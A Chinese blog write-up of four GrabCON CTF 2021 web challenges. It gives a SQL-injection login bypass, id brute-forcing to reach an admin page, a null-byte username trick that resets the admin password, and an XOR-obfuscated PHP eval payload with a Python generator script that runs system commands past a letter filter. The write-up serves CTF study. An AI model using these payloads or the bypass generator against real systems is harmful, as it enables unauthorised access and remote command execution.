GrabCON CTF 2021 Web

最新推荐文章于 2023-10-27 22:06:31 发布
最新推荐文章于 2023-10-27 22:06:31 发布
阅读量285 收藏
点赞数
分类专栏: # BUUCTF-Web 文章标签: CTF WEB安全 SQL注入 RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyj20010728/article/details/120168485
版权

GrabCON CTF 2021 Web

E4sy Pe4sy

题目描述

  • Hack admin user!

解题思路

  • 找到登录处尝试利用万能密码进行登录,发现密码处存在万能密码登录 admin:admin' or 1=1#
  • 登录后即可拿到 FLAG

在这里插入图片描述

Door Lock

题目描述

  • The door is open to all! See who is behind the admin door??

解题思路

  • 注册账号后登录后台,注意到 http://34.135.171.18/profile/index.php?id=1460 后面跟着的 id,联想到题目描述,尝试爆破 id 的数值,在 id 数值为 1766 的页面中成功找到 FLAG

在这里插入图片描述

Basic Calc

题目描述

  • Ever used calc based on php?

解题思路

  • 题目给出部分源码
<h2>Welcome to da Basic Calc</h2>
<form action="/" method="POST">
    Enter da equation : <br>
    <input type="text" name="eq"><br>
</form>

<?php

if (isset($_POST["eq"])){
    
    $eq = $_POST["eq"];

    if(preg_match("/[A-Za-z`]+/",$eq)){
        die("BAD.");
    }
    echo "Result: ";
    eval("echo " . $eq . " ;");
}else{
  echo highlight_file('index.php',true);  
}

?>
  • 由于过滤掉了大小写字母无法直接执行命令,这里采用异或方式利用未被过滤的字符来获取字母从而绕过正则过滤
  • 先查看一下根目录下的文件
("system")("ls /")=(('3'^'@').('9'^'@').('3'^'@').('4'^'@').('8'^']').('2'^'_'))(('1'^']').('3'^'@').('^'^'~').'/')
  • 获取 FLAG
("system")("cat /flagggg.txt")=(('3'^'@').('9'^'@').('3'^'@').('4'^'@').('8'^']').('2'^'_'))(('8'^'[').('!'^'@').('4'^'@').('^'^'~').'/'.('8'^'^').('1'^']').('!'^'@').('8'^'_').('8'^'_').('8'^'_').('8'^'_').'.'.('4'^'@').('8'^'@').('4'^'@'))

在这里插入图片描述

  • 贴一下异或脚本
# string_code = ['system','ls /']
string_code = ['system','cat /flagggg.txt']
obfuscated_code = ""
charset = "1234567890!#$%&'()*+/^,-.:;<=>?@[]_{|}~"

for code in string_code:
    obfuscated = ""
    for i in code:
        is_found_obfuscated = False
        for j in charset:
            for k in charset:
                if ord(j)^ord(k) == ord(i):
                    is_found_obfuscated = True
                    obfuscated += ".('%s'^'%s')" % (j, k)
                    #print("XOR ="+chr(ord(j)^ord(k)))
                if is_found_obfuscated:
                    break
            if is_found_obfuscated:
                break
        if not is_found_obfuscated:
            obfuscated += ".'%s'" % i
    #print("(%s) = (%s)" % (code, obfuscated[1:]))
    obfuscated_code += "(%s)" % obfuscated[1:]
print(''.join(["(\"%s\")" % i for i in string_code]) + '=' + obfuscated_code)

Null Food Factory

题目描述

  • Prove your hacking skill to get admin panel.

解题思路

  • 依旧还是之前的SQL注入题目,尝试一些方法都没有效果后,注意到 NUll 字眼,搜索相关的SQL注入利用方式发现一种叫做 空字符 注入的方法,参考漏洞说明
  • 注册一个用户名为 admin%00 的用户,发现 admin 的密码更新成 ic8aGsk^bh

在这里插入图片描述

  • 用得到的密码进行登录 admin:ic8aGsk^bh,成功拿到 FLAG

在这里插入图片描述

H3rmesk1t
关注
专栏目录
NSSCTF-SWPUCTF 2021 新生赛-web-wp
F1rstb100d
09-19 800
NSSCTF-SWPUCTF 2021 新生赛-web-wp
卫生CTF 2021 Web
feng的博客
07-11 1551
前言 比赛是第二届全国卫生健康行业网络安全技能大赛,赛后借了个账号复现了一下Web题,整体偏简单叭,做到CMS那题的时候环境关了。 签到 f12,拿到flag。 easy_web1 f12发现There_is_no_flag_here.php,再f12提示本地访问: Client-ip:127.0.0.1 即可得到flag。 easy_web2 ctfshow上的原题,直接打了: ?shell=/???/????64 /???????? 然后base64解码即可。 super_hacker Via 头
[红明谷CTF 2021]JavaWeb
Mrs_H的博客
04-08 2330
[红明谷CTF 2021]JavaWeb 一.前言 好像是已经很久不刷题了,因为最近一直在忙着复习高数和专业课,拿不出太多的时间来打CTF。但是这次也总算是找到了点时间,做道java的简单题来放松一下,不能总是学那些书本上的知识了,感觉学多了也会烦。 二.正文 这道题目上来就让我们访问/login目录,所以我们直接访问试试看。 服务器那边又让我们访问/json的路径,但是我们如果用post方法对服务器进行访问的话,服务器又会返回另外的结果。 这里的登陆失败,就表明我们需要进行身份验证,我们尝试输入一对用
[红明谷CTF 2021]EasyTP
Sk1y的博客
01-01 2578
[红明谷CTF 2021]EasyTP 文章目录[红明谷CTF 2021]EasyTP解题过程解法1:报错注入解法2:开堆叠写shell解法3:rogue-mysql-server参考链接 解题过程 打开容器 源码泄露/www.zip 下载下来,发现是thinkphp3.2.3的,找链子:ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链 (f5.pm) 注意在源码中,控制器中存在反序列化,以这个为入手点 在BUUCTF的环境中,database=test,password
网络安全CTFWeb基础
晓梦林的博客
09-21 7295
Web类的考试,在CTF比赛中十分常见。本人从计算机专业转网络安全发展,属于半路出家,一知半解,如有总结不到位的地方,欢迎交流分享。
NSSCTF题库[SWPUCTF 2021 新生赛]+部分新生赛签到题
热门推荐
J1ng_Hong的博客
10-27 2万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
[SWPUCTF 2021 新生赛]gift_F12
wyxlsm的博客
02-18 1027
直接F12 打开开发者界面。点击搜索 直接搜flag值。
[SWPUCTF 2021 新生赛]caidao
rev1ve的博客
03-05 1294
[SWPUCTF 2021 新生赛]caidao
[红明谷CTF 2021]JavaWeb buu刷题记录
weixin_51458899的博客
04-08 1894
映入眼帘的报错,然后搜一下知道是spring的洞 有个登录,然后提示json,又看到cookie cve-2020-11989 Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) - 腾讯安全玄武实验室 (tencent.com) Apache Shiro权限绕过漏洞分析(CVE-2020-11989) (qq.com) 参考这两篇,得出两种攻击方式 payload1: 双编码绕过 / -> %2f ->%25%32%66 payload2: 分号 使用payl
Java安全-Java In CTF([红明谷CTF 2021]JavaWeb、[红明谷CTF 2021]JavaWeb
Love&Share
05-05 2387
文章目录[RoarCTF 2019]Easy Java[红明谷CTF 2021]JavaWeb [RoarCTF 2019]Easy Java 存在文件下载,尝试去读 WEB-INF/web.xml,get 传参发现一直失败 在 burp 中改为 post 传参,可以正常下载文件 只要再去读 class 文件即可 成功下载 class 放到 idea 中,拿到 flag [红明谷CTF 2021]JavaWeb 题目提示 /login 目录,访问提示 /json 访问 /json 跳回到 /lo.
[SWPUCTF 2021 新生赛]web 解题思路,实操解析,解题软件,解题方法
09-06
关于sql注入
[SWPUCTF 2021 新生赛]web 中国蚁剑.zip
最新发布
09-07
中国蚁剑是一款强大的Web解题软件,主要用于渗透测试和安全研究。它提供了一个用户友好的界面,允许用户通过简单的操作来进行Web应用程序的漏洞扫描和利用。蚁剑支持多种常见的Web漏洞,如SQL注入、命令执行等,用户...
【NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(WEB篇)
jameshuangchuan的博客
08-08 3131
此处主要在NSSCTF平台()上开展刷题。
利用fastcoll实现MD5碰撞
LYJ20010728的博客
03-07 2711
源码: <?php show_source(__FILE__); class CDUTSEC { public $var1; public $var2; function __construct($var1, $var2) { $var1 = $var1; $var2 = $var2; } function __destruct() { echo md5($this->var1);
[极客大挑战 2020]Greatphp
LYJ20010728的博客
05-31 1843
[极客大挑战 2020]Greatphp考点思路Payload 考点 PHP原生类利用、PHP反序列化、md5()和sha1()对类进行hash触发__toString方法 思路 进入题目,分析源码,题目绕过类型第一眼看上去在ctf的基础题目中非常常见,一般情况下只需要使用数组即可绕过,但是由于这里是在类里面,我们不能这么做 所以我们可以使用含有 __toString 方法的PHP内置类来绕过,用的两个比较多的内置类就是 Exception 和 Error ,他们之中有一个 __toString 方
HFCTF-2021-Final-easyflask
LYJ20010728的博客
05-31 1686
HFCTF-2021-Final-easyflask考点思路Payload 考点 Python os.path.join trick、环境变量暴露敏感信息、pickle 反序列化 RCE、Flask Session 伪造 思路 进入题目,hint提示/file?file=index.js,进去之后又提示Source at /app/source,获得源码信息 注意 /file 路由,用户上传的 path 会被拼接到 static 目录后面,这里有个trick,当 os.path.join 的第二个参
Exception类绕过md5、sha1等
LYJ20010728的博客
03-07 1492
源码: <?php show_source(__FILE__); class CDUTSEC { public $var1; public $var2; function __construct($var1, $var2) { $var1 = $var1; $var2 = $var2; } function __destruct() { echo md5($this->var1);
[羊城杯 2020]EasySer
LYJ20010728的博客
05-17 1395
[羊城杯 2020]EasySerEasySer考点思路Payloadeasyphp考点思路Payload EasySer 考点 1) PHP 基础代码审计 2) SSRF本地文件读取 3) 反序列化写入webshell,绕过死亡绕过 思路 1) 源码写了不安全协议从本地,想到http 和127.0.0.1 2) 读源码看反序列化,写入shell 3) 伪协议base64绕过die(),rot13等等都可以 Payload buuctf上做这道题时,页面让我一脸茫然,一度怀疑环境坏了… 没啥
[羊城杯 2020]easyphp
LYJ20010728的博客
05-17 1370
[羊城杯 2020]easyphpeasyphp考点思路Payload easyphp 考点 .htaccess的利用 思路 在目录下,只有index.php能够作为php解析执行,于是我们可以写一个.htaccess让index.php自动包含执行代码; 思路一:向.htaccess文件写入shell,并且用auto_prepend_file包含.htaccess,但是file关键字被ban了,可以用换行绕过,结尾要用\处理content中的\n; 思路二:利用.htaccess文件特性,不过这次是
UNCTF2021 Web与Crypto挑战解析
本文档是关于UNCTF2021网络安全竞赛的一些解题心得与解决方案,主要涵盖了WEB、Reserve和Crypto三个领域的挑战。 1. WEB挑战 (1) fuzz_md5 这个挑战涉及到MD5碰撞和preg_replace漏洞的利用。参赛者需要构造一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值